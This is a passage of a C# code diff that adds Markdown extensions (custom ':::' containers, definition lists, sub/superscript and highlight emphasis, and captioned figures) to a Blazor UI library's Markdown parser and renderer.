+                }
+            }
+
+            inner.Add(line);
         }
 
         var container = new BitMarkdownContainerNode { Name = name, Title = title };
-        container.Children.AddRange(state.ParseBlocks(inner));
+        // The content is every line after the opening fence, kept in order, so it maps one-to-one
+        // onto the document's own lines.
+        container.Children.AddRange(state.ParseBlocks(inner, state.Line + 1));
         output.Add(container);
         state.Line = i;
+        return true;
+    }
+
+    /// <summary>True when <paramref name="line"/> is a fence that opens a container.</summary>
+    private static bool Opens(string line)
+        => ReadFence(line, out string name, out _) > 0 && name.Length > 0;
+
+    /// <summary>
+    /// Reads the <c>```</c> / <c>~~~</c> run opening or closing a fenced code block, and whether it
+    /// carries an info string - which only an opening fence may.
+    /// </summary>
+    private static bool ReadCodeFence(string line, out string marker, out bool hasInfo)
+    {
+        marker = string.Empty;
+        hasInfo = false;
+
+        int indent = 0;
+        while (indent < line.Length && line[indent] == ' ') indent++;
+        if (indent > 3 || indent >= line.Length) return false;
+
+        char c = line[indent];
+        if (c is not ('`' or '~')) return false;
+
+        int i = indent;
+        while (i < line.Length && line[i] == c) i++;
+        if (i - indent < 3) return false;
+
+        marker = line[indent..i];
+        hasInfo = line[i..].Trim().Length > 0;
         return true;
     }
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerBlockParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerBlockParser.cs
@@ -1,0 +1,104 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Parses custom containers: a fence of three or more colons, optionally followed by a name and a
+/// title, up to a closing fence of at least as many colons carrying no info of its own.
+/// </summary>
+/// <remarks>
+/// Containers nest: an inner fence that opens (it carries a name) is balanced against its own
+/// closing fence, so <c>:::tip</c> inside <c>:::note</c> ends where it should rather than closing
+/// the outer one.
+/// </remarks>
+public sealed class BitMarkdownContainerBlockParser : BitMarkdownBlockParser
+{
+    // Between the block quote (40) and the indented code block (50): a container fence sits at the
+    // margin, so nothing indented can be mistaken for one.
+    public override int Order => 45;
+
+    public override bool CanInterruptParagraph(BitMarkdownBlockProcessor state, int lineIndex)
+        => ReadFence(state.Lines[lineIndex], out _, out _) > 0;
+
+    public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
+    {
+        var lines = state.Lines;
+        if (ReadFence(lines[state.Line], out string name, out string? title) == 0) return false;
+
+        var inner = new List<string>();
+        int depth = 1;
+        int i = state.Line + 1;
+        for (; i < lines.Count; i++)
+        {
+            int fence = ReadFence(lines[i], out string innerName, out _);
+            if (fence > 0 && innerName.Length > 0)
+            {
+                // A nested opening fence: keep it in the content and balance it.
+                depth++;
+            }
+            else if (fence > 0 && innerName.Length == 0)
+            {
+                // Any fence carrying no info closes one level, whatever its length. Balancing by
+                // nesting rather than by fence length is what lets "::::note" hold ":::tip" - the
+                // pattern a longer outer fence exists for - close in the right order.
+                depth--;
+                if (depth == 0) { i++; break; }
+            }
+
+            inner.Add(lines[i]);
+        }
+
+        var container = new BitMarkdownContainerNode { Name = name, Title = title };
+        container.Children.AddRange(state.ParseBlocks(inner));
+        output.Add(container);
+        state.Line = i;
+        return true;
+    }
+
+    /// <summary>
+    /// Returns the length of the colon fence opening <paramref name="line"/> (0 when it is not a
+    /// fence), along with the name and title of its info string.
+    /// </summary>
+    private static int ReadFence(string line, out string name, out string? title)
+    {
+        name = string.Empty;
+        title = null;
+
+        int indent = 0;
+        while (indent < line.Length && line[indent] == ' ') indent++;
+        // Four spaces of indentation makes it an indented code block, not a fence.
+        if (indent > 3) return 0;
+
+        int colons = 0;
+        int i = indent;
+        while (i < line.Length && line[i] == ':') { colons++; i++; }
+        if (colons < 3) return 0;
+
+        string info = line[i..].Trim();
+        if (info.Length == 0) return colons;
+
+        // A fence's info is "name [title]"; the name is what the class is built from, so it is
+        // slugified rather than taken as written.
+        int space = info.IndexOfAny([' ', '\t']);
+        string rawName = space < 0 ? info : info[..space];
+        name = Slugify(rawName);
+        if (name.Length == 0) return 0;
+
+        if (space >= 0)
+        {
+            string rest = info[(space + 1)..].Trim();
+            if (rest.Length > 0) title = rest;
+        }
+
+        return colons;
+    }
+
+    private static string Slugify(string text)
+    {
+        var sb = new System.Text.StringBuilder(text.Length);
+        foreach (char c in text.ToLowerInvariant())
+        {
+            if (char.IsLetterOrDigit(c)) sb.Append(c);
+            else if (c is '-' or '_' && sb.Length > 0) sb.Append('-');
+        }
+        return sb.ToString().TrimEnd('-');
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerExtension.cs
@@ -1,0 +1,15 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables custom containers: <c>:::name optional title</c> ... <c>:::</c> renders as a
+/// <c>div</c> classed after the name, which is how documentation sites write admonitions and
+/// layout blocks.
+/// </summary>
+public sealed class BitMarkdownContainerExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.BlockParsers.Add(new BitMarkdownContainerBlockParser());
+        builder.Renderers.Add(new BitMarkdownContainerRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerNode.cs
@@ -1,0 +1,24 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// A custom container: a <c>:::</c>-fenced block whose info word names what it is, the way docs
+/// sites write admonitions (<c>:::warning</c>) and layout blocks (<c>:::grid</c>).
+/// </summary>
+public sealed class BitMarkdownContainerNode : BitMarkdownNode
+{
+    /// <summary>
+    /// The container's name, lower-cased and slugified, which becomes part of its class name.
+    /// Empty when the fence carried no info string.
+    /// </summary>
+    public string Name { get; init; } = string.Empty;
+
+    /// <summary>
+    /// The rest of the info string after the name - the container's title, when it has one.
+    /// </summary>
+    public string? Title { get; init; }
+
+    /// <summary>The blocks fenced by the container.</summary>
+    public List<BitMarkdownNode> Children { get; } = new();
+
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownContainerRenderer.cs
@@ -1,0 +1,62 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Renders a <see cref="BitMarkdownContainerNode"/> as a <c>div</c> carrying its name as a class,
+/// so a stylesheet decides what a container called "warning" or "grid" looks like without the
+/// renderer knowing about any of them.
+/// </summary>
+public sealed class BitMarkdownContainerRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is BitMarkdownContainerNode;
+
+    /// <summary>The container name that renders as a collapsible <c>&lt;details&gt;</c>.</summary>
+    /// <remarks>
+    /// Markdown has no syntax of its own for a collapsible section, and the convention every docs
+    /// site settled on is a container called "details" - so <c>:::details How it works</c> is the
+    /// one name this renderer treats as more than a class.
+    /// </remarks>
+    public const string DetailsName = "details";
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        var container = (BitMarkdownContainerNode)node;
+
+        if (container.Name == DetailsName)
+        {
+            WriteDetails(r, b, container);
+            return;
+        }
+
+        b.OpenElement(0, "div");
+        b.AddAttribute(1, "class", container.Name.Length == 0
+            ? "markdown-container"
+            : $"markdown-container markdown-container-{container.Name}");
+
+        if (string.IsNullOrEmpty(container.Title) is false)
+        {
+            b.OpenElement(2, "p");
+            b.AddAttribute(3, "class", "markdown-container-title");
+            b.AddContent(4, container.Title);
+            b.CloseElement();
+        }
+
+        r.WriteNodes(b, container.Children);
+        b.CloseElement();
+    }
+
+    private static void WriteDetails(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownContainerNode container)
+    {
+        b.OpenElement(5, "details");
+        b.AddAttribute(6, "class", "markdown-container markdown-container-details");
+        // A <details> with no <summary> is labelled "Details" by the browser in whatever language
+        // it likes; writing the title ourselves keeps the label the author's.
+        b.OpenElement(7, "summary");
+        b.AddContent(8, string.IsNullOrEmpty(container.Title) ? container.Name : container.Title);
+        b.CloseElement();
+        r.WriteNodes(b, container.Children);
+        b.CloseElement();
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListBlockParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListBlockParser.cs
@@ -1,0 +1,130 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Parses definition lists in the shape Pandoc and markdown-it use: a term on its own line,
+/// followed by one or more definitions each opened by a <c>:</c> marker.
+/// </summary>
+/// <remarks>
+/// <code>
+/// Blazor
+/// : A framework for building web UI with C#.
+/// : Ships in .NET.
+/// </code>
+/// A definition's continuation lines are indented under its text, the way a list item's are, so a
+/// definition can hold several paragraphs or a nested list.
+/// </remarks>
+public sealed class BitMarkdownDefinitionListBlockParser : BitMarkdownBlockParser
+{
+    // After lists (60) and before pipe tables (65): a term line is otherwise paragraph text, and
+    // its ":" marker must not be confused with a table's alignment row.
+    public override int Order => 63;
+
+    public override bool CanInterruptParagraph(BitMarkdownBlockProcessor state, int lineIndex)
+        => IsTerm(state.Lines, lineIndex);
+
+    public override bool TryParse(BitMarkdownBlockProcessor state, List<BitMarkdownNode> output)
+    {
+        var lines = state.Lines;
+        if (IsTerm(lines, state.Line) is false) return false;
+
+        var list = new BitMarkdownDefinitionListNode();
+        int i = state.Line;
+
+        while (i < lines.Count && IsTerm(lines, i))
+        {
+            var term = new BitMarkdownDefinitionTermNode();
+            term.Inlines.AddRange(state.ParseInlines(lines[i].Trim()));
+            list.Children.Add(term);
+            i++;
+
+            while (i < lines.Count && TryReadMarker(lines[i], out int contentColumn, out string first))
+            {
+                var content = new List<string> { first };
+                i++;
+
+                // Continuation lines belong to this definition while they are indented to (or past)
+                // its text column, or are blank and followed by such a line.
+                while (i < lines.Count)
+                {
+                    if (BitMarkdownBlockProcessor.IsBlank(lines[i]))
+                    {
+                        int j = i + 1;
+                        while (j < lines.Count && BitMarkdownBlockProcessor.IsBlank(lines[j])) j++;
+                        if (j < lines.Count && BitMarkdownBlockProcessor.GetIndent(lines[j]) >= contentColumn)
+                        {
+                            content.Add(string.Empty);
+                            i++;
+                            continue;
+                        }
+                        break;
+                    }
+
+                    if (BitMarkdownBlockProcessor.GetIndent(lines[i]) < contentColumn) break;
+
+                    content.Add(BitMarkdownBlockProcessor.StripIndent(lines[i], contentColumn));
+                    i++;
+                }
+
+                var description = new BitMarkdownDefinitionDescriptionNode();
+                description.Children.AddRange(state.ParseBlocks(content));
+                list.Children.Add(description);
+            }
+
+            // A blank line between one definition and the next term keeps the same list going.
+            int next = i;
+            while (next < lines.Count && BitMarkdownBlockProcessor.IsBlank(lines[next])) next++;
+            if (next > i && next < lines.Count && IsTerm(lines, next)) i = next;
+        }
+
+        output.Add(list);
+        state.Line = i;
+        return true;
+    }
+
+    // A term is a non-blank, unindented line that is not itself a definition marker and whose next
+    // line opens one. Requiring the marker on the following line is what keeps ordinary prose -
+    // which never has one - out of definition lists entirely.
+    private static bool IsTerm(IReadOnlyList<string> lines, int index)
+    {
+        if (index + 1 >= lines.Count) return false;
+
+        string line = lines[index];
+        if (BitMarkdownBlockProcessor.IsBlank(line)) return false;
+        if (BitMarkdownBlockProcessor.GetIndent(line) >= 4) return false;
+        if (TryReadMarker(line, out _, out _)) return false;
+
+        return TryReadMarker(lines[index + 1], out _, out _);
+    }
+
+    // Reads a ": definition" marker, returning the column its text starts at (so the definition's
+    // continuation lines can be measured against it) and that first line of text.
+    private static bool TryReadMarker(string line, out int contentColumn, out string first)
+    {
+        contentColumn = 0;
+        first = string.Empty;
+
+        int indent = 0;
+        int i = 0;
+        while (i < line.Length && (line[i] is ' ' or '\t'))
+        {
+            indent += line[i] == '\t' ? 4 - (indent % 4) : 1;
+            i++;
+        }
+        if (indent > 3 || i >= line.Length || line[i] != ':') return false;
+
+        i++;
+        int spaces = 0;
+        while (i < line.Length && (line[i] is ' ' or '\t'))
+        {
+            spaces += line[i] == '\t' ? 4 - ((indent + 1 + spaces) % 4) : 1;
+            i++;
+        }
+        // The marker has to be followed by whitespace, so neither a lone ":" nor a ":::" container
+        // fence is read as one.
+        if (spaces == 0) return false;
+
+        contentColumn = indent + 1 + spaces;
+        first = line[i..];
+        return true;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListBlockParser.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListBlockParser.cs
@@ -40,6 +40,7 @@ public sealed class BitMarkdownDefinitionListBlockParser : BitMarkdownBlockParse
             while (i < lines.Count && TryReadMarker(lines[i], out int contentColumn, out string first))
             {
                 var content = new List<string> { first };
+                int markerLine = i;
                 i++;
 
                 // Continuation lines belong to this definition while they are indented to (or past)
@@ -66,7 +67,9 @@ public sealed class BitMarkdownDefinitionListBlockParser : BitMarkdownBlockParse
                 }
 
                 var description = new BitMarkdownDefinitionDescriptionNode();
-                description.Children.AddRange(state.ParseBlocks(content));
+                // The definition's first line is the remainder of its ":" line and every
+                // continuation line was taken one for one from there on.
+                description.Children.AddRange(state.ParseBlocks(content, markerLine));
                 list.Children.Add(description);
             }
 

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListExtension.cs
@@ -1,0 +1,14 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables definition lists: a term on its own line followed by <c>: its definition</c> renders as
+/// a real <c>&lt;dl&gt;</c>, which is what a glossary, an API reference or a set of options is.
+/// </summary>
+public sealed class BitMarkdownDefinitionListExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.BlockParsers.Add(new BitMarkdownDefinitionListBlockParser());
+        builder.Renderers.Add(new BitMarkdownDefinitionListRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListNodes.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListNodes.cs
@@ -1,0 +1,26 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// A definition list: terms with the definitions that belong to them, rendered as
+/// <c>&lt;dl&gt;</c>. Its children alternate <see cref="BitMarkdownDefinitionTermNode"/> and
+/// <see cref="BitMarkdownDefinitionDescriptionNode"/>, in the order they were written.
+/// </summary>
+public sealed class BitMarkdownDefinitionListNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Children { get; } = new();
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}
+
+/// <summary>A term being defined, rendered as <c>&lt;dt&gt;</c>.</summary>
+public sealed class BitMarkdownDefinitionTermNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Inlines { get; } = new();
+    public override IList<BitMarkdownNode> ChildNodes => Inlines;
+}
+
+/// <summary>One definition of the term above it, rendered as <c>&lt;dd&gt;</c>.</summary>
+public sealed class BitMarkdownDefinitionDescriptionNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Children { get; } = new();
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownDefinitionListRenderer.cs
@@ -1,0 +1,44 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>Renders a definition list as <c>&lt;dl&gt;</c> / <c>&lt;dt&gt;</c> / <c>&lt;dd&gt;</c>.</summary>
+public sealed class BitMarkdownDefinitionListRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is
+        BitMarkdownDefinitionListNode or BitMarkdownDefinitionTermNode or BitMarkdownDefinitionDescriptionNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        switch (node)
+        {
+            case BitMarkdownDefinitionListNode list:
+                b.OpenElement(0, "dl");
+                r.WriteNodes(b, list.Children);
+                b.CloseElement();
+                break;
+
+            case BitMarkdownDefinitionTermNode term:
+                b.OpenElement(1, "dt");
+                r.WriteNodes(b, term.Inlines);
+                b.CloseElement();
+                break;
+
+            case BitMarkdownDefinitionDescriptionNode description:
+                b.OpenElement(2, "dd");
+                // A definition of a single paragraph reads as part of the list rather than as a
+                // block of its own, exactly like a tight list item.
+                if (description.Children.Count == 1 && description.Children[0] is BitMarkdownParagraphNode only)
+                {
+                    r.WriteNodes(b, only.Inlines);
+                }
+                else
+                {
+                    r.WriteNodes(b, description.Children);
+                }
+                b.CloseElement();
+                break;
+        }
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmojiExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmojiExtension.cs
@@ -17,6 +17,19 @@ public sealed class BitMarkdownEmojiExtension : IBitMarkdownExtension
         _overrides = new Dictionary<string, string>(overrides);
     }
 
+    public bool IsSameConfigurationAs(IBitMarkdownExtension other)
+    {
+        if (other is not BitMarkdownEmojiExtension e) return false;
+        if (_overrides is null || e._overrides is null) return _overrides is null && e._overrides is null;
+        if (_overrides.Count != e._overrides.Count) return false;
+
+        foreach (var pair in _overrides)
+        {
+            if (e._overrides.TryGetValue(pair.Key, out var value) is false || value != pair.Value) return false;
+        }
+        return true;
+    }
+
     public void Setup(BitMarkdownPipelineBuilder builder)
         => builder.AstProcessors.Add(_overrides is null
             ? new BitMarkdownEmojiAstProcessor()

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtraNodes.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtraNodes.cs
@@ -1,0 +1,29 @@
+namespace Bit.BlazorUI;
+
+/// <summary>Subscript text (<c>H~2~O</c>), rendered as <c>&lt;sub&gt;</c>.</summary>
+public sealed class BitMarkdownSubscriptNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Children { get; } = new();
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}
+
+/// <summary>Superscript text (<c>x^2^</c>), rendered as <c>&lt;sup&gt;</c>.</summary>
+public sealed class BitMarkdownSuperscriptNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Children { get; } = new();
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}
+
+/// <summary>Inserted text (<c>++added++</c>), rendered as <c>&lt;ins&gt;</c>.</summary>
+public sealed class BitMarkdownInsertedNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Children { get; } = new();
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}
+
+/// <summary>Highlighted text (<c>==important==</c>), rendered as <c>&lt;mark&gt;</c>.</summary>
+public sealed class BitMarkdownMarkedNode : BitMarkdownNode
+{
+    public List<BitMarkdownNode> Children { get; } = new();
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtrasDelimiterProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtrasDelimiterProcessor.cs
@@ -1,0 +1,51 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Delimiter processor for the three emphasis flavors that are not part of CommonMark or GFM but
+/// are shared by every major processor: <c>^superscript^</c>, <c>++inserted++</c> and
+/// <c>==highlighted==</c>. Subscript rides on <c>~</c>, which strikethrough already owns, so it
+/// lives on <see cref="BitMarkdownStrikethroughDelimiterProcessor"/> instead.
+/// </summary>
+public sealed class BitMarkdownEmphasisExtrasDelimiterProcessor : BitMarkdownDelimiterProcessor
+{
+    public override char[] Characters => new[] { '^', '+', '=' };
+
+    public override (bool canOpen, bool canClose) GetFlanking(
+        char c, bool leftFlanking, bool rightFlanking, char prev, char next)
+        => (leftFlanking, rightFlanking);
+
+    public override int TryCreate(char c, int openLength, int closeLength,
+        List<BitMarkdownNode> children, out BitMarkdownNode? node)
+    {
+        // '^' is a single-character delimiter; '+' and '=' need a run of two, so that ordinary
+        // prose ("1+2", "a=b") and the "+" list marker are never mistaken for emphasis.
+        int required = c == '^' ? 1 : 2;
+        if (openLength < required || closeLength < required)
+        {
+            node = null;
+            return 0;
+        }
+
+        switch (c)
+        {
+            case '^':
+                var sup = new BitMarkdownSuperscriptNode();
+                sup.Children.AddRange(children);
+                node = sup;
+                break;
+
+            case '+':
+                var ins = new BitMarkdownInsertedNode();
+                ins.Children.AddRange(children);
+                node = ins;
+                break;
+
+            default:
+                var mark = new BitMarkdownMarkedNode();
+                mark.Children.AddRange(children);
+                node = mark;
+                break;
+        }
+        return required;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtrasExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtrasExtension.cs
@@ -1,0 +1,28 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables the emphasis flavors beyond CommonMark's <c>*</c>/<c>_</c> and GFM's <c>~~</c>:
+/// <c>~subscript~</c>, <c>^superscript^</c>, <c>++inserted++</c> and <c>==highlighted==</c>,
+/// rendered as <c>&lt;sub&gt;</c>, <c>&lt;sup&gt;</c>, <c>&lt;ins&gt;</c> and <c>&lt;mark&gt;</c>.
+/// </summary>
+/// <remarks>
+/// Subscript shares the <c>~</c> character with strikethrough, and a delimiter character may only
+/// belong to one processor. This extension therefore replaces whatever claims <c>~</c> with the
+/// processor that reads both lengths - one <c>~</c> as subscript, two as strikethrough - so the
+/// two flavors can be enabled in either order, and enabling this one implies strikethrough.
+/// </remarks>
+public sealed class BitMarkdownEmphasisExtrasExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.DelimiterProcessors.RemoveAll(p => Array.IndexOf(p.Characters, '~') >= 0);
+        builder.DelimiterProcessors.Add(new BitMarkdownStrikethroughDelimiterProcessor(subscript: true));
+        builder.DelimiterProcessors.Add(new BitMarkdownEmphasisExtrasDelimiterProcessor());
+
+        // Registering the strikethrough renderer here as well keeps "~~" rendering whether or not
+        // BitMarkdownStrikethroughExtension is also in the pipeline. A renderer is chosen by what
+        // it accepts, so a second registration of the same one is harmless.
+        builder.Renderers.Add(new BitMarkdownStrikethroughRenderer());
+        builder.Renderers.Add(new BitMarkdownEmphasisExtrasRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtrasRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownEmphasisExtrasRenderer.cs
@@ -1,0 +1,41 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>Renders the subscript, superscript, inserted and highlighted inline nodes.</summary>
+public sealed class BitMarkdownEmphasisExtrasRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is
+        BitMarkdownSubscriptNode or BitMarkdownSuperscriptNode or BitMarkdownInsertedNode or BitMarkdownMarkedNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        switch (node)
+        {
+            case BitMarkdownSubscriptNode sub:
+                b.OpenElement(0, "sub");
+                r.WriteNodes(b, sub.Children);
+                b.CloseElement();
+                break;
+
+            case BitMarkdownSuperscriptNode sup:
+                b.OpenElement(1, "sup");
+                r.WriteNodes(b, sup.Children);
+                b.CloseElement();
+                break;
+
+            case BitMarkdownInsertedNode ins:
+                b.OpenElement(2, "ins");
+                r.WriteNodes(b, ins.Children);
+                b.CloseElement();
+                break;
+
+            case BitMarkdownMarkedNode mark:
+                b.OpenElement(3, "mark");
+                r.WriteNodes(b, mark.Children);
+                b.CloseElement();
+                break;
+        }
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureAstProcessor.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureAstProcessor.cs
@@ -1,0 +1,56 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Turns a paragraph that holds nothing but a titled image into a
+/// <see cref="BitMarkdownFigureNode"/>, so the picture and its caption are one element instead of
+/// a picture with a tooltip nobody sees.
+/// </summary>
+/// <remarks>
+/// The caption comes from the image's title (<c>![alt](/url "the caption")</c>), never from its
+/// alt text: alt describes the image for someone who cannot see it and a caption is read by
+/// everyone, so using the alt twice would have a screen reader say the same sentence twice. An
+/// image with no title is left as it was.
+/// </remarks>
+public sealed class BitMarkdownFigureAstProcessor : BitMarkdownAstProcessor
+{
+    public override void Process(BitMarkdownDocumentNode document, BitMarkdownPipeline pipeline)
+    {
+        BitMarkdownAstHelper.VisitChildLists(document, list =>
+        {
+            for (int i = 0; i < list.Count; i++)
+            {
+                if (list[i] is not BitMarkdownParagraphNode paragraph) continue;
+                if (TryConvert(paragraph) is { } figure) list[i] = figure;
+            }
+        });
+    }
+
+    private static BitMarkdownFigureNode? TryConvert(BitMarkdownParagraphNode paragraph)
+    {
+        BitMarkdownImageNode? image = null;
+
+        foreach (var inline in paragraph.Inlines)
+        {
+            switch (inline)
+            {
+                // Only the image, plus whatever whitespace surrounds it on its own line.
+                case BitMarkdownImageNode found when image is null:
+                    image = found;
+                    break;
+
+                case BitMarkdownTextNode text when text.Text.Trim().Length == 0:
+                case BitMarkdownLineBreakNode:
+                    break;
+
+                default:
+                    return null;
+            }
+        }
+
+        if (image is null || string.IsNullOrWhiteSpace(image.Title)) return null;
+
+        var figure = new BitMarkdownFigureNode { Caption = image.Title! };
+        figure.Children.Add(image);
+        return figure;
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureExtension.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureExtension.cs
@@ -1,0 +1,15 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// Enables figures: an image alone in a paragraph, written with a title
+/// (<c>![alt](/url "the caption")</c>), renders as a <c>&lt;figure&gt;</c> with that title as its
+/// <c>&lt;figcaption&gt;</c>.
+/// </summary>
+public sealed class BitMarkdownFigureExtension : IBitMarkdownExtension
+{
+    public void Setup(BitMarkdownPipelineBuilder builder)
+    {
+        builder.AstProcessors.Add(new BitMarkdownFigureAstProcessor());
+        builder.Renderers.Add(new BitMarkdownFigureRenderer());
+    }
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureNode.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureNode.cs
@@ -1,0 +1,21 @@
+namespace Bit.BlazorUI;
+
+/// <summary>
+/// An image that stands on its own with a caption, rendered as
+/// <c>&lt;figure&gt;&lt;img&gt;&lt;figcaption&gt;</c>.
+/// </summary>
+/// <remarks>
+/// The image is held as an ordinary child rather than as a property of its own, so every generic
+/// pass over the tree still reaches it - the viewer's image policy included, which would otherwise
+/// let a cross-origin image load simply because it had been given a caption.
+/// </remarks>
+public sealed class BitMarkdownFigureNode : BitMarkdownNode
+{
+    /// <summary>The figure's content: the image it is built around.</summary>
+    public List<BitMarkdownNode> Children { get; } = new();
+
+    public override IList<BitMarkdownNode> ChildNodes => Children;
+
+    /// <summary>The caption, taken from the image's title.</summary>
+    public string Caption { get; init; } = string.Empty;
+}

--- a/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureRenderer.cs
+++ b/src/BlazorUI/Bit.BlazorUI.Extras/Services/Markdown/Extensions/BitMarkdownFigureRenderer.cs
@@ -1,0 +1,24 @@
+using Microsoft.AspNetCore.Components.Rendering;
+
+namespace Bit.BlazorUI;
+
+/// <summary>Renders a <see cref="BitMarkdownFigureNode"/> as a figure with its caption.</summary>
+public sealed class BitMarkdownFigureRenderer : BitMarkdownNodeRenderer
+{
+    public override bool Accept(BitMarkdownNode node) => node is BitMarkdownFigureNode;
+
+    // Fixed literal sequence numbers (see BitMarkdownCoreRenderer for the rationale).
+    public override void Write(BitMarkdownRenderer r, RenderTreeBuilder b, BitMarkdownNode node)
+    {
+        var figure = (BitMarkdownFigureNode)node;
+
+        b.OpenElement(0, "figure");
+        // The image itself is written by whichever renderer owns it, so the figure inherits every
+        // safeguard the core renderer puts on an image (lazy loading, no referrer, ...).
+        r.WriteNodes(b, figure.Children);
+        b.OpenElement(1, "figcaption");
